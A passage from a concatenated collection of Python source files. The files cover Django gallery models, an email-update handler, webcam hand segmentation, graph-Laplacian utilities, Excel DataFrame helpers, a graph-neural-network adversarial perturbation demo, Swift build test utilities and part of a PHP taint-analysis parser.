print("./config file configure failed.\nError: {0}\nSee Help: https://github.com/wufeifei/cobra/wiki/Config".format(e.message))
exit()
self.value = value
|
py | b400174f056a778ba03e3f66fae7ea2c078d45a6 | # -*- coding: utf-8 -*-
import os
import Image
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.conf import settings
from django.contrib.auth.models import User
from filebrowser.fields import FileBrowseField
from filebrowser.base import FileObject
from uuslug import uuslug as slugify
from sorl.thumbnail import ImageField
class Gallery(models.Model):
title = models.CharField("Имя", max_length=255)
visits_num = models.PositiveIntegerField("Кол. посещений", default=0, editable=False)
def __unicode__(self):
return self.title
def inc_visits(self):
self.visits_num += 1
self.save()
class Meta:
verbose_name = "Галерея изображений к рецептам"
verbose_name_plural = "Галереии изображений к рецептам"
def get_upload_path(instance, filename):
from utils import timestampbased_filename
gallery_slug = slugify(instance.gallery.title)
user_slug = slugify(instance.author.username) if instance.author else "anonymous"
path = os.path.join(
'gallery',
gallery_slug,
user_slug,
timestampbased_filename(filename))
return path
class GalleryImage(models.Model):
image = ImageField("Изображение", upload_to=get_upload_path, max_length=255)
title = models.CharField("Подпись", max_length=255, blank=True, null=True)
author = models.ForeignKey(User, verbose_name="Автор", blank=True, null=True)
gallery = models.ForeignKey(Gallery, verbose_name="Галерея изображений", related_name="images")
visits_num = models.PositiveIntegerField("Кол. посещений", default=0, editable=False)
def __unicode__(self):
return self.title if self.title else self.image.name
def inc_visits(self):
self.visits_num += 1
self.save()
class Meta:
verbose_name = "Изображение"
verbose_name_plural = "Изображения"
@receiver(post_save, sender=GalleryImage)
def watermark(sender, instance, created, **kwargs):
from utils import add_watermark
marked_img = add_watermark(instance.image)
if not marked_img:
return
instance.image = marked_img
instance.save()
|
py | b400184760815ea19c86646cd4533a92c8e6ae08 | # Copyright 2010 by Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles requests from a UI hook to get users started with email update."""
__author__ = '[email protected]'
import re
import cache
import mail_editor
import utils
from feedlib.errors import ErrorMessage
from feedlib.struct import Struct
EMAIL_PATTERN = re.compile(
r'(?:^|\s)[-a-z0-9_.%+]+@(?:[-a-z0-9]+\.)+[a-z]{2,6}(?:\s|$)',re.IGNORECASE)
def is_valid_email(email):
"""Basic validation for an email address,
returns True if valid, False if invalid, None if empty string."""
if not email:
return None
if EMAIL_PATTERN.match(email):
return True
class MailEditorStart(utils.Handler):
"""Handler for /mail_editor_start, which is a UI hook to get
users started with RF's email update feature. The handler
sends a template email for updating the provided facility
to the provided address.
Attributes:
email: the email address to mail
Methods:
init(): handles initialization tasks for the class
post(): responds to HTTP POST requests
"""
def init(self):
"""Handles any initialization tasks for the class."""
self.email = self.request.get('email')
def post(self):
"""Responds to HTTP POST requests."""
self.init()
if not is_valid_email(self.email):
#i18n: Error message for invalid email address
self.write(_('Email address is invalid.'))
return
self.minimal_subject = cache.MINIMAL_SUBJECTS[
self.subdomain].get(self.params.subject_name)
if not self.minimal_subject:
#i18n: Error message for invalid subject
raise ErrorMessage(400, _('Invalid subject'))
title = self.minimal_subject.get_value('title', '')
min_subjects = mail_editor.get_min_subjects_by_lowercase_title(
self.subdomain, title)
if len(min_subjects) > 1:
title = '%s (%s)' % (title, self.params.subject_name)
to = '%s-updates@%s' % (self.subdomain, self.get_parent_domain()
.replace('appspot.com', 'appspotmail.com'))
message = Struct()
message.sender = self.email
message.to = to
message.subject = ('Resource Finder: Email update instructions for %s'
% title)
editor = mail_editor.MailEditor()
editor.request = self.request
editor.init(message)
editor.send_template_email(message, self.minimal_subject, title)
self.write('OK')
if __name__ == '__main__':
utils.run([('/mail_editor_start', MailEditorStart)], debug=True)
|
py | b40019656464f94d0a39c8daae144207dc1f8ef2 | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
setup_args = generate_distutils_setup(
packages=['sm_classes'],
package_dir={'': 'src'}
)
setup(**setup_args) |
py | b400198066e2a01a6639495c1c0ffca61ac5093a | #-------------------------------------------
# SEGMENT HAND REGION FROM A VIDEO SEQUENCE
#-------------------------------------------
# organize imports
import cv2
import imutils
import numpy as np
from PIL import Image as im
import time
from modelPredict import *
from interfaceModule import *
from configuration import *
# global variables
bg = None
bgfg = 0
#--------------------------------------------------
# To find the running average over the background
#--------------------------------------------------
def run_avg(image, aWeight):
global bg
# initialize the background
if bg is None:
bg = image.copy().astype("float")
return
# compute weighted average, accumulate it and update the background
cv2.accumulateWeighted(image, bg, aWeight)
#---------------------------------------------
# To segment the region of hand in the image
#---------------------------------------------
def segment(image, threshold = 50):
global bg
thresholded = None
# find the absolute difference between background and current frame
diff = cv2.absdiff(bg.astype("uint8"), image)
mytime = time.localtime()
if mytime.tm_hour < 6 or mytime.tm_hour > 18:
# print ('It is night-time')
threshold = 50
thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY )[1]
else:
# print ('It is day-time')
threshold = 127
thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
# threshold the diff image so that we get the foreground
# thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY )[1]
# get the contours in the thresholded image
(cnts, _) = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# return None, if no contours detected
if len(cnts) == 0:
return
else:
# based on contour area, get the maximum contour which is the hand
segmented = max(cnts, key=cv2.contourArea)
return (thresholded, segmented)
#-----------------
# MAIN FUNCTION
#-----------------
if __name__ == "__main__":
# initialize weight for running average
aWeight = 0.5
# get the reference to the webcam
camera = cv2.VideoCapture(0)
# region of interest (ROI) coordinates
top, right, bottom, left = 1, 400, 350, 800
# initialize num of frames
num_frames = 0
lasttime = int(time.time())
# keep looping, until interrupted
while(True):
# get the current frame
(grabbed, frame) = camera.read()
# resize the frame
frame = imutils.resize(frame, width=800)
# flip the frame so that it is not the mirror view
frame = cv2.flip(frame, 1)
# clone the frame
clone = frame.copy()
# get the height and width of the frame
(height, width) = frame.shape[:2]
# get the ROI
roi = frame[top:bottom, right:left]
# convert the roi to grayscale and blur it
gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7),0)
# to get the background, keep looking till a threshold is reached
# so that our running average model gets calibrated
if num_frames < 25:
run_avg(gray, aWeight)
else:
# segment the hand region
hand = segment(gray)
# check whether hand region is segmented
if hand is not None:
# if yes, unpack the thresholded image and
# segmented region
(thresholded, segmented) = hand
# draw the segmented region and display the frame
cv2.drawContours(clone, [segmented + (right, top)], -1, (0, 0, 255))
dataImage = im.fromarray(thresholded)
cur = int(time.time())
if cur >= (lasttime + 5):
lasttime = cur
print('Welcome')
strval = classifier(dataImage)
# print(cnfg(strval))
interfacer(strval, cnfg(strval))
print('Hello ---> '+strval)
cv2.imshow("Threshloded value", thresholded)
# cv2.imwrite(str(int(time.time()))+'.jpg', thresholded)
# draw the segmented hand
cv2.rectangle(clone, (left, top), (right, bottom), (0,255,0), 2)
# increment the number of frames
num_frames += 1
# display the frame with segmented hand
cv2.imshow("Video Feed", clone)
# observe the keypress by the user
keypress = cv2.waitKey(1) & 0xFF
# if the user pressed "q", then stop looping
if keypress == ord("q"):
resetVal()
break
# free up memory
camera.release()
cv2.destroyAllWindows() |
py | b40019cb00780c59dcf9d7c4987ff3fc61aa7ed0 | from __future__ import absolute_import
import numpy as np
from scipy import sparse as sp
from scipy.sparse.linalg import ArpackNoConvergence
def degree(adj):
"""
Computes the degree matrix of the given adjacency matrix.
:param adj: rank 2 array or sparse matrix
:return: the degree matrix in sparse DIA format
"""
degrees = np.array(adj.sum(1)).flatten()
return sp.diags(degrees)
def degree_power(adj, pow):
"""
Computes \(D^{p}\) from the given adjacency matrix. Useful for computing
normalised Laplacians.
:param adj: rank 2 array or sparse matrix
:param pow: exponent to which elevate the degree matrix
:return: the exponentiated degree matrix in sparse DIA format
"""
degrees = np.power(np.array(adj.sum(1)), pow).flatten()
degrees[np.isinf(degrees)] = 0.
return sp.diags(degrees, 0)
def normalized_adjacency(adj, symmetric=True):
"""
Normalizes the given adjacency matrix using the degree matrix as either
\(D^{-1}A\) or \(D^{-1/2}AD^{-1/2}\) (symmetric normalization).
:param adj: rank 2 array or sparse matrix;
:param symmetric: boolean, compute symmetric normalization;
:return: the normalized adjacency matrix.
"""
if symmetric:
normalized_D = degree_power(adj, -0.5)
if sp.issparse(adj):
output = normalized_D.dot(adj).dot(normalized_D)
else:
normalized_D = normalized_D.toarray()
output = normalized_D.dot(adj).dot(normalized_D)
else:
normalized_D = degree_power(adj, -1.)
output = normalized_D.dot(adj)
return output
def laplacian(adj):
"""
Computes the Laplacian of the given adjacency matrix as \(D - A\).
:param adj: rank 2 array or sparse matrix;
:return: the Laplacian.
"""
return degree(adj) - adj
def normalized_laplacian(adj, symmetric=True):
"""
Computes a normalized Laplacian of the given adjacency matrix as
\(I - D^{-1}A\) or \(I - D^{-1/2}AD^{-1/2}\) (symmetric normalization).
:param adj: rank 2 array or sparse matrix;
:param symmetric: boolean, compute symmetric normalization;
:return: the normalized Laplacian.
"""
I = sp.eye(adj.shape[-1], dtype=adj.dtype)
normalized_adj = normalized_adjacency(adj, symmetric=symmetric)
return I - normalized_adj
def rescale_laplacian(L, lmax=2):
"""
Rescales the Laplacian eigenvalues in [-1,1], using lmax as largest eigenvalue.
"""
if lmax is None:
try:
lmax = sp.linalg.eigsh(L, 1, which='LM', return_eigenvectors=False)[0]
except ArpackNoConvergence:
lmax = 2
L_scaled = (2. / lmax) * L - sp.eye(L.shape[0], dtype=L.dtype)
return L_scaled
def localpooling_filter(adj, symmetric=True):
"""
Computes the local pooling filter from the given adjacency matrix, as
described by Kipf & Welling (2017).
:param adj: a np.array or scipy.sparse matrix of rank 2 or 3;
:param symmetric: boolean, whether to normalize the matrix as
\(D^{-\\frac{1}{2}}AD^{-\\frac{1}{2}}\) or as \(D^{-1}A\);
:return: the filter matrix, as dense np.array.
"""
fltr = adj.copy()
I = sp.eye(adj.shape[-1], dtype=adj.dtype)
if adj.ndim == 3:
for i in range(adj.shape[0]):
A_tilde = adj[i] + I
fltr[i] = normalized_adjacency(A_tilde, symmetric=symmetric)
else:
A_tilde = adj + I
fltr = normalized_adjacency(A_tilde, symmetric=symmetric)
return fltr
def chebyshev_polynomial(X, k):
"""
Calculates Chebyshev polynomials up to order k.
:param X: a np.array or scipy.sparse matrix;
:param k: the order up to which compute the polynomials,
:return: a list of k + 1 sparse matrices with one element for each degree of
the approximation.
"""
T_k = list()
T_k.append(sp.eye(X.shape[0], dtype=X.dtype).tocsr())
T_k.append(X)
def chebyshev_recurrence(T_k_minus_one, T_k_minus_two, X):
X_ = sp.csr_matrix(X, copy=True)
return 2 * X_.dot(T_k_minus_one) - T_k_minus_two
for i in range(2, k + 1):
T_k.append(chebyshev_recurrence(T_k[-1], T_k[-2], X))
return T_k
def chebyshev_filter(adj, k, symmetric=True):
"""
Computes the Chebyshev filter from the given adjacency matrix, as described
in Defferrard et at. (2016).
:param adj: a np.array or scipy.sparse matrix;
:param k: integer, the order up to which to compute the Chebyshev polynomials;
:param symmetric: boolean, whether to normalize the matrix as
\(D^{-\\frac{1}{2}}AD^{-\\frac{1}{2}}\) or as \(D^{-1}A\);
:return: a list of k+1 filter matrices, as np.arrays.
"""
normalized_adj = normalized_adjacency(adj, symmetric)
L = sp.eye(adj.shape[0], dtype=adj.dtype) - normalized_adj # Compute Laplacian
# Rescale Laplacian
L_scaled = rescale_laplacian(L)
# Compute Chebyshev polynomial approximation
T_k = chebyshev_polynomial(L_scaled, k)
return T_k
|
py | b4001a2e827b544e40fc6202ef6f3e0131d273b0 | """
Collection of functions for manipulating DataFrames in Excel.
"""
from pyxll import xl_func, get_type_converter
import pandas as pd
import numpy as np
@xl_func("dataframe, int, str[], int: dataframe", auto_resize=True)
def df_head(df, n, columns=[], offset=0):
"""Return the first n rows of a DataFrame."""
columns = [c for c in columns if c]
if columns:
df = df[columns]
if offset:
df = df.iloc[offset:]
return df.head(n)
@xl_func("dataframe, int, str[], int: dataframe", auto_resize=True)
def df_tail(df, n, columns=[], offset=0):
"""Return the last n rows of a DataFrame."""
columns = [c for c in columns if c]
if columns:
df = df[columns]
if offset:
df = df.iloc[offset:]
return df.tail(n)
@xl_func("dataframe, str[], int: object")
def df_drop(df, columns, axis=1):
"""Drop columns from a dataframe"""
columns = [c for c in columns if c is not None]
return df.drop(columns, axis=axis)
@xl_func("dataframe df, float[] percentiles, string[] include, string[] exclude: dataframe<index=True>",
auto_resize=True)
def df_describe(df, percentiles=None, include=None, exclude=None):
"""Describe a pandas DataFrame"""
return df.describe(percentiles=percentiles,
include=include,
exclude=exclude)
@xl_func("dataframe, dict: object")
def df_eval(df, exprs):
"""Evaluate a string describing operations on DataFrame columns."""
new_columns = {}
for key, expr in exprs.items():
new_columns[key] = df.eval(expr)
new_df = pd.DataFrame(new_columns)
return df.join(new_df)
@xl_func("dataframe, str, int: object")
def df_apply(df, func, axis=0):
return df.apply(func, axis=axis)
@xl_func("dataframe, var, var: object")
def df_divide(df, x, axis=0):
return df.divide(x, axis=axis)
@xl_func("dataframe, var: object")
def df_multiply(df, x, axis=0):
return df.multiply(x, axis=axis)
@xl_func("dataframe, var, var: object")
def df_add(df, x, axis=0):
return df.add(x, axis=0)
@xl_func("dataframe, var, var: object")
def df_subtract(df, x, axis=0):
return df.subtract(x, axis=0)
@xl_func("dataframe, str[], str[], str[], var: object")
def df_pivot_table(df, index, columns=None, values=None, aggfunc="mean"):
"""Return reshaped DataFrame organized by given index / column values."""
if isinstance(aggfunc, list):
to_dict = get_type_converter("var", "dict")
aggfunc = to_dict(aggfunc)
df = df.reset_index()
return df.pivot_table(index=index,
columns=columns,
values=values,
aggfunc=aggfunc)
@xl_func("dataframe: object")
def df_stack(df):
return df.stack()
|
py | b4001a3ccc5d06fe5f473bf28f9a4684beae0555 | import graphgallery as gg
from graphgallery import functional as gf
from graphgallery.datasets import NPZDataset
data = NPZDataset('cora',
root="~/GraphData/datasets/",
verbose=False,
transform="standardize")
graph = data.graph
splits = data.split_nodes(random_state=15)
################### Attacker model ############################
target = 1
attacker = gg.attack.targeted.DICE(graph, seed=123).process()
attacker.attack(target)
################### Victim model ############################
# Before attack
trainer = gg.gallery.nodeclas.GCN(seed=123).make_data(graph).build()
his = trainer.fit(splits.train_nodes,
splits.val_nodes,
verbose=1,
epochs=100)
original_predict = trainer.predict(target, transform="softmax")
# After attack
trainer = gg.gallery.nodeclas.GCN(seed=123).make_data(attacker.g).build()
his = trainer.fit(splits.train_nodes,
splits.val_nodes,
verbose=1,
epochs=100)
perturbed_predict = trainer.predict(target, transform="softmax")
################### Results ############################
print("original prediction", original_predict)
print("perturbed prediction", perturbed_predict)
target_label = graph.node_label[target]
print(f"The True label of node {target} is {target_label}.")
print(
f"The probability of prediction has gone down {original_predict[target_label]-perturbed_predict[target_label]}"
)
"""original prediction [0.00212943 0.0030072 0.90525377 0.03167017 0.01139321 0.00445553
0.04209068]
perturbed prediction [0.02642256 0.02367809 0.5953164 0.10504714 0.06514036 0.03142949
0.15296602]
The True label of node 1 is 2.
The probability of prediction has gone down 0.30993735790252686"""
|
py | b4001ad728662cacc98aa8436b91addb98025ad2 | # This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2020 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
from __future__ import absolute_import, unicode_literals
import functools
import os
import platform
import sys
import unittest
from io import StringIO
from build_swift import cache_utils
from build_swift.versions import Version
__all__ = [
'quiet_output',
'redirect_stderr',
'redirect_stdout',
'requires_attr',
'requires_module',
'requires_platform',
'requires_python',
]
# -----------------------------------------------------------------------------
# Constants
_PYTHON_VERSION = Version(platform.python_version())
# -----------------------------------------------------------------------------
# Helpers
def _can_import(fullname):
try:
__import__(fullname)
return True
except ImportError:
return False
# -----------------------------------------------------------------------------
class quiet_output(object):
"""Context manager and decorator used to quiet both sys.stderr and
sys.stdout by redirecting them to os.devnull.
"""
__slots__ = ('_devnull', '_old_stderr', '_old_stdout')
def __enter__(self):
self._devnull = open(os.devnull, 'w')
self._old_stderr = sys.stderr
self._old_stdout = sys.stdout
sys.stderr = self._devnull
sys.stdout = self._devnull
def __exit__(self, exc_type, exc_value, traceback):
sys.stderr = self._old_stderr
sys.stdout = self._old_stdout
self._devnull.close()
def __call__(self, func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
with self:
return func(*args, **kwargs)
return wrapper
class redirect_stderr(object):
"""Context manager used to substitute sys.stderr with a different file-like
object.
"""
__slots__ = ('_stream', '_old_stderr')
def __init__(self, stream=None):
self._stream = stream or StringIO()
def __enter__(self):
self._old_stderr, sys.stderr = sys.stderr, self._stream
return self._stream
def __exit__(self, exc_type, exc_value, traceback):
sys.stderr = self._old_stderr
class redirect_stdout():
"""Context manager used to substitute sys.stdout with a different file-like
object.
"""
__slots__ = ('_stream', '_old_stdout')
def __init__(self, stream=None):
self._stream = stream or StringIO()
def __enter__(self):
self._old_stdout, sys.stderr = sys.stderr, self._stream
return self._stream
def __exit__(self, exc_type, exc_value, traceback):
sys.stderr = self._old_stdout
@cache_utils.cache
def requires_attr(obj, attr):
"""Decorator used to skip tests if an object does not have the required
attribute.
"""
try:
getattr(obj, attr)
return lambda func: func
except AttributeError:
return unittest.skip('Required attribute "{}" not found on {}'.format(
attr, obj))
@cache_utils.cache
def requires_module(fullname):
"""Decorator used to skip tests if a module is not imported.
"""
if _can_import(fullname):
return lambda func: func
return unittest.skip('Unable to import "{}"'.format(fullname))
@cache_utils.cache
def requires_platform(name):
"""Decorator used to skip tests if not running on the given platform.
"""
if name == platform.system():
return lambda func: func
return unittest.skip(
'Required platform "{}" does not match system'.format(name))
@cache_utils.cache
def requires_python(version):
"""Decorator used to skip tests if the running Python version is not
greater or equal to the required version.
"""
if isinstance(version, str):
version = Version(version)
if _PYTHON_VERSION >= version:
return lambda func: func
return unittest.skip(
'Requires Python version {} or greater'.format(version))
|
py | b4001be9fddfa07b4a8a312134e54a9f8a56d3bf | # -*- coding: utf-8 -*-
"""
parser
~~~~~~
Implements Code Parser
:author: BlBana <[email protected]>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
from phply.phplex import lexer # 词法分析
from phply.phpparse import make_parser # 语法分析
from phply import phpast as php
from .log import logger
import re
import codecs
with_line = True
scan_results = [] # 结果存放列表初始化
is_repair_functions = [] # 修复函数初始化
def export(items):
result = []
if items:
for item in items:
if hasattr(item, 'generic'):
item = item.generic(with_lineno=with_line)
result.append(item)
return result
def export_list(params, export_params):
"""
将params中嵌套的多个列表,导出为一个列表
:param params:
:param export_params:
:return:
"""
for param in params:
if isinstance(param, list):
export_params = export_list(param, export_params)
else:
export_params.append(param)
return export_params
def get_all_params(nodes): # 用来获取调用函数的参数列表,nodes为参数列表
"""
获取函数结构的所有参数
:param nodes:
:return:
"""
params = []
export_params = [] # 定义空列表,用来给export_list中使用
for node in nodes:
if isinstance(node.node, php.FunctionCall): # 函数参数来自另一个函数的返回值
params = get_all_params(node.node.params)
else:
if isinstance(node.node, php.Variable):
params.append(node.node.name)
if isinstance(node.node, php.BinaryOp):
params = get_binaryop_params(node.node)
params = export_list(params, export_params)
if isinstance(node.node, php.ArrayOffset):
param = get_node_name(node.node.node)
params.append(param)
if isinstance(node.node, php.Cast):
param = get_cast_params(node.node.expr)
params.append(param)
if isinstance(node.node, php.Silence):
param = get_silence_params(node.node)
params.append(param)
return params
def get_silence_params(node):
"""
用来提取Silence类型中的参数
:param node:
:return:
"""
param = []
if isinstance(node.expr, php.Variable):
param = get_node_name(node.expr)
if isinstance(node.expr, php.FunctionCall):
param.append(node.expr)
if isinstance(node.expr, php.Eval):
param.append(node.expr)
if isinstance(node.expr, php.Assignment):
param.append(node.expr)
return param
def get_cast_params(node):
"""
用来提取Cast类型中的参数
:param node:
:return:
"""
param = []
if isinstance(node, php.Silence):
param = get_node_name(node.expr)
return param
def get_binaryop_params(node): # 当为BinaryOp类型时,分别对left和right进行处理,取出需要的变量
"""
用来提取Binaryop中的参数
:param node:
:return:
"""
# logger.debug('[AST] Binaryop --> {node}'.format(node=node))
params = []
buffer_ = []
if isinstance(node.left, php.Variable):
params.append(node.left.name)
else:
params = get_binaryop_deep_params(node.left, params)
if isinstance(node.right, php.Variable):
params.append(node.right.name)
else:
params = get_binaryop_deep_params(node.right, params)
params = export_list(params, buffer_)
return params
def get_binaryop_deep_params(node, params): # 取出right,left不为变量时,对象结构中的变量
"""
取出深层的变量名
:param node: node为上一步中的node.left或者node.right节点
:param params:
:return:
"""
if isinstance(node, php.ArrayOffset): # node为数组,取出数组变量名
param = get_node_name(node.node)
params.append(param)
if isinstance(node, php.BinaryOp): # node为BinaryOp,递归取出其中变量
param = get_binaryop_params(node)
params.append(param)
if isinstance(node, php.FunctionCall): # node为FunctionCall,递归取出其中变量名
params = get_all_params(node.params)
if isinstance(node, php.Constant):
params.append(node)
if type(node) is str:
params.append(node)
return params
def get_expr_name(node): # expr为'expr'中的值
"""
获取赋值表达式的表达式部分中的参数名-->返回用来进行回溯
:param node:
:return:
"""
param_lineno = 0
is_re = False
if isinstance(node, php.ArrayOffset): # 当赋值表达式为数组
param_expr = get_node_name(node.node) # 返回数组名
param_lineno = node.node.lineno
elif isinstance(node, php.Variable): # 当赋值表达式为变量
param_expr = node.name # 返回变量名
param_lineno = node.lineno
elif isinstance(node, php.FunctionCall): # 当赋值表达式为函数
param_expr = get_all_params(node.params) # 返回函数参数列表
param_lineno = node.lineno
is_re = is_repair(node.name) # 调用了函数,判断调用的函数是否为修复函数
elif isinstance(node, php.BinaryOp): # 当赋值表达式为BinaryOp
param_expr = get_binaryop_params(node)
param_lineno = node.lineno
else:
param_expr = node
return param_expr, param_lineno, is_re
def get_node_name(node): # node为'node'中的元组
"""
获取Variable类型节点的name
:param node:
:return:
"""
if isinstance(node, php.Variable):
return node.name # 返回此节点中的变量名
if isinstance(node, php.ObjectProperty):
return node
def get_filename(node, file_path): # 获取filename
"""
获取
:param node:
:param file_path:
:return:
"""
filename = node.expr
filenames = []
if isinstance(filename, php.BinaryOp):
filenames = get_binaryop_params(filename)
elif type(filename) is str:
filenames = [filename]
for i in range(len(filenames)):
if isinstance(filenames[i], php.Constant):
constant_node = filenames[i]
constant_node_name = constant_node.name
f = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
file_content = f.read()
parser = make_parser()
all_nodes = parser.parse(file_content, debug=False, lexer=lexer.clone(), tracking=with_line)
for node in all_nodes:
if isinstance(node, php.FunctionCall) and node.name == "define":
define_params = node.params
if len(define_params) == 2 and define_params[0].node == constant_node_name:
filenames[i] = define_params[1].node
if isinstance(filenames[i], php.Constant): # 如果还没找到该常量,暂时退出
logger.warning("[AST] [INCLUDE FOUND] Can't found this constart {}, pass it ".format(filenames[i]))
filenames[i] = "not_found"
return filenames
def is_repair(expr):
"""
判断赋值表达式是否出现过滤函数,如果已经过滤,停止污点回溯,判定漏洞已修复
:param expr: 赋值表达式
:return:
"""
is_re = False # 是否修复,默认值是未修复
global is_repair_functions
if expr in is_repair_functions:
logger.debug("[AST] function {} in is_repair_functions, The vulnerability does not exist ")
is_re = True
return is_re
def is_sink_function(param_expr, function_params):
"""
判断自定义函数的入参-->判断此函数是否是危险函数
:param param_expr:
:param function_params:
:return:
"""
is_co = -1
cp = None
if function_params is not None:
for function_param in function_params:
if param_expr == function_param:
is_co = 2
cp = function_param
logger.debug('[AST] is_sink_function --> {function_param}'.format(function_param=cp))
return is_co, cp
def is_controllable(expr, flag=None): # 获取表达式中的变量,看是否在用户可控变量列表中
"""
判断赋值表达式是否是用户可控的
:param expr:
:return:
"""
controlled_params = [
'$_GET',
'$_POST',
'$_REQUEST',
'$_COOKIE',
'$_FILES',
# '$_SERVER', # 暂时去掉了,误报率太高了
'$HTTP_POST_FILES',
'$HTTP_COOKIE_VARS',
'$HTTP_REQUEST_VARS',
'$HTTP_POST_VARS',
'$HTTP_RAW_POST_DATA',
'$HTTP_GET_VARS'
]
if isinstance(expr, php.ObjectProperty):
return 3, php.Variable(expr)
if isinstance(expr, php.New) or isinstance(expr, php.MethodCall) or isinstance(expr, php.FunctionCall):
return 3, php.Variable(expr)
if isinstance(expr, php.Variable):
expr = expr.name
if expr in controlled_params: # 当为可控变量时 返回1
logger.debug('[AST] is_controllable --> {expr}'.format(expr=expr))
if flag:
return 1, expr
return 1, php.Variable(expr)
try:
if expr.startswith("$"):
if flag:
return 3, expr
return 3, php.Variable(expr)
except AttributeError:
pass
except:
raise
return -1, php.Variable(expr)
# def function_deep_back(param, nodes, function_params): # 回溯函数定义位置
# """
# 递归回溯函数定义位置,传入param类型不同
# :param param:
# :param nodes:
# :return:
# """
# function_name = param.name
# is_co = 3
# cp = param
# expr_lineno = 0
# print nodes
# for node in nodes[::-1]:
# if isinstance(node, php.Function):
# if node.name == function_name:
# function_nodes = node.nodes
#
# # 进入递归函数内语句
# for function_node in function_nodes:
# if isinstance(function_node, php.Return):
# return_node = function_node.node
# return_param = return_node.node
# is_co, cp, expr_lineno = parameters_back(return_param, function_nodes, function_params)
#
# return is_co, cp, expr_lineno
def function_back(param, nodes, function_params, vul_function=None): # 回溯函数定义位置
"""
递归回溯函数定义位置,传入param类型不同
:param function_params:
:param vul_function:
:param param:
:param nodes:
:return:
"""
function_name = param.name
is_co = 3
cp = param
expr_lineno = 0
for node in nodes[::-1]:
if isinstance(node, php.Function):
if node.name == function_name:
function_nodes = node.nodes
# 进入递归函数内语句
for function_node in function_nodes:
if isinstance(function_node, php.Return):
return_node = function_node.node
return_param = return_node.node
is_co, cp, expr_lineno = parameters_back(return_param, function_nodes, function_params,
vul_function=vul_function)
return is_co, cp, expr_lineno
def array_back(param, nodes, vul_function=None): # 回溯数组定义赋值
"""
递归回溯数组赋值定义
:param vul_function:
:param param:
:param nodes:
:return:
"""
param_name = param.node.name
param_expr = param.expr
is_co = 3
cp = param
expr_lineno = 0
# print nodes
for node in nodes[::-1]:
if isinstance(node, php.Assignment):
param_node_name = get_node_name(node.node)
param_node = node.node
param_node_expr = node.expr
if param_node_name == param_name: # 处理数组中值被改变的问题
if isinstance(node.expr, php.Array):
for p_node in node.expr.nodes:
if p_node.key == param_expr:
if isinstance(p_node.value, php.ArrayOffset): # 如果赋值值仍然是数组,先经过判断在进入递归
is_co, cp = is_controllable(p_node.value.node.name)
if is_co != 1:
is_co, cp, expr_lineno = array_back(param, nodes)
else:
n_node = php.Variable(p_node.value)
is_co, cp, expr_lineno = parameters_back(n_node, nodes, vul_function=vul_function)
if param == param_node: # 处理数组一次性赋值,左值为数组
if isinstance(param_node_expr, php.ArrayOffset): # 如果赋值值仍然是数组,先经过判断在进入递归
is_co, cp = is_controllable(param_node_expr.node.name)
if is_co != 1:
is_co, cp, expr_lineno = array_back(param, nodes)
else:
is_co, cp = is_controllable(param_node_expr)
if is_co != 1 and is_co != -1:
n_node = php.Variable(param_node_expr.node.value)
is_co, cp, expr_lineno = parameters_back(n_node, nodes, vul_function=vul_function)
return is_co, cp, expr_lineno
def class_back(param, node, lineno, vul_function=None):
"""
回溯类中变量
:param vul_function:
:param param:
:param node:
:param lineno:
:return:
"""
class_name = node.name
class_nodes = node.nodes
vul_nodes = []
for class_node in class_nodes:
if class_node.lineno < int(lineno):
vul_nodes.append(class_node)
is_co, cp, expr_lineno = parameters_back(param, vul_nodes, lineno=lineno, vul_function=vul_function)
if is_co == 1 or is_co == -1: # 可控或者不可控,直接返回
return is_co, cp, expr_lineno
elif is_co == 3:
for class_node in class_nodes:
if isinstance(class_node, php.Method) and class_node.name == '__construct':
class_node_params = class_node.params
constructs_nodes = class_node.nodes
# 递归析构函数
is_co, cp, expr_lineno = parameters_back(param, constructs_nodes, function_params=class_node_params,
lineno=lineno, vul_function=vul_function)
if is_co == 3:
# 回溯输入参数
for param in class_node_params:
if param.name == cp.name:
logger.info(
"[Deep AST] Now vulnerability function in class from class {}() param {}".format(
class_name, cp.name))
is_co = 4
cp = tuple([node, param, class_node_params])
return is_co, cp, 0
return is_co, cp, expr_lineno
def new_class_back(param, nodes, vul_function=None):
"""
分析新建的class,自动进入tostring函数
:param vul_function:
:param param:
:param nodes:
:return:
"""
param = param.name
param_name = param.name
param_params = param.params
is_co = -1
cp = param
expr_lineno = 0
for node in nodes:
if isinstance(node, php.Class) and param_name == node.name:
class_nodes = node.nodes
for class_node in class_nodes:
if isinstance(class_node, php.Method) and class_node.name == '__toString':
tostring_nodes = class_node.nodes
logger.debug("[AST] try to analysize class {}() function tostring...".format(param_name))
for tostring_node in tostring_nodes:
if isinstance(tostring_node, php.Return):
return_param = tostring_node.node
is_co, cp, expr_lineno = parameters_back(return_param, tostring_nodes,
vul_function=vul_function)
return is_co, cp, expr_lineno
else:
is_co = 3
cp = php.Variable(param)
return is_co, cp, expr_lineno
def parameters_back(param, nodes, function_params=None, lineno=0,
function_flag=0, vul_function=None): # 用来得到回溯过程中的被赋值的变量是否与敏感函数变量相等,param是当前需要跟踪的污点
"""
